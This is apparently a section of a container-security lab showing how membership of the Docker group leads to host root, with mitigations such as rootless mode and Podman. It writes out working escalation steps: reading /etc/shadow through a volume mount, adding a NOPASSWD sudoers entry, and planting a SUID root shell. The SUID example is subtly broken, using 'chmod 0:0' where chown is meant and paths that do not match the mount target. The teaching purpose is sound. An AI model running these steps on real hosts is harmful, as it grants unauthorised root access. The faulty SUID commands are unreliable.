2.8. Container Runtime Security

Do the following commands on your VM and read the outputs carefully:

whoami
head -1 /etc/shadow

Now do this:

docker run -v /etc:/host alpine sh -c 'whoami;head -1 /host/shadow'

Why can you suddenly read stuff that you shouldn’t be allowed to? Are containers not restricted? The answer lies in the architecture of Docker:

Docker Architecture

By default, the Docker Deamon runs in root mode without user namespaces enabled. This means we can mount anything from the host into our container and change it there too using the root user inside our container.

It gets worse, just read the excerpt below:

user2@localhost$ whoami
user2
user2@localhost$ sudo su
Sorry, user user2 may not run sudo on localhost.
user2@localhost$ docker run --rm -it -v /etc/sudoers.d:/host/etc/sudoers.d alpine sh
/ # echo 'user2 ALL=(ALL) NOPASSWD:ALL' > /host/etc/sudoers.d/user2
/ # exit
user2@localhost$ sudo su
root@localhost$ whoami
root

To ensure that a user running a container doesn’t gain root access to your host, you run the container engine and the containerized process as a non-root user. This provides multiple layers of security between the service (httpd, MySQL, etc.) and the privileged resources in the operating system.

Running the container engine as a non-root user, is one layer of defense, while running the process in the container as a different non-root user offers yet another layer of defense.

Here is an excerpt from the docs : Rootless mode executes the Docker daemon and containers inside a user namespace. This is very similar to userns-remap mode, except that with userns-remap mode, the daemon itself runs with root privileges, whereas in rootless mode, both the daemon and the container are running without root privileges (or in other words, the user inside the container is mapped to an uid >1000 and the container process (shim) has the uid 1000)

Running rootless mode in Docker comes with a set of limitations, most notably that not all storage drivers are allowed, direct networking is not possible , not all Capabilities can be given to a Container and AppArmor is not supported.

Another solution would be to switch from Docker to Podman .

While Docker relies on a client-server model, Podman employs a daemonless architecture. With Podman’s approach, users manage containers directly, eliminating the need for a continuous daemon process in the background.

Compared to Docker it has stronger default security settings, most notably tha ability to run without beeing privileged, features like rootless containers, user namespaces, and seccomp profiles are enabled by default. On the image below we see a comparison between Docker and Podman architecture.

Podman Architecture, src: https://dev.to/arafetki

SUID Privilege Escalation via Shared User Namespace Example

If your container is running as root, you have a host mount and usernamespaces are not enabled you could leverage this to create a suid binary like so:

docker run -it \
  --name tmp_bind_test \
  --mount type=bind,source=/tmp/mydata,target=/container/temp \
  ubuntu /bin/bash

Now inside the container you can do the following:

cp /usr/bin/sh /tmp/mydata/
chmod 0:0 tmp/mydata/sh
chmod 4755 /tmp/mydata/sh

You succesfully placed a root shell to /tmp which could be executed by a local user on the host.

Recap

We saw how to run containers and how to secure them avoiding root, dropping capabilities, mounting filesystems read-only and using Linux Security Modules such as seccomp. However, it is important to say that because of the architecture of docker, anyone who can start a container has more privileges on the host. It is still important to secure the Host Operating system and maybe to run a deamonless container technology like podname. What we did not touch are things like network security and monitoring. More on that in the Kubernetes Security lab.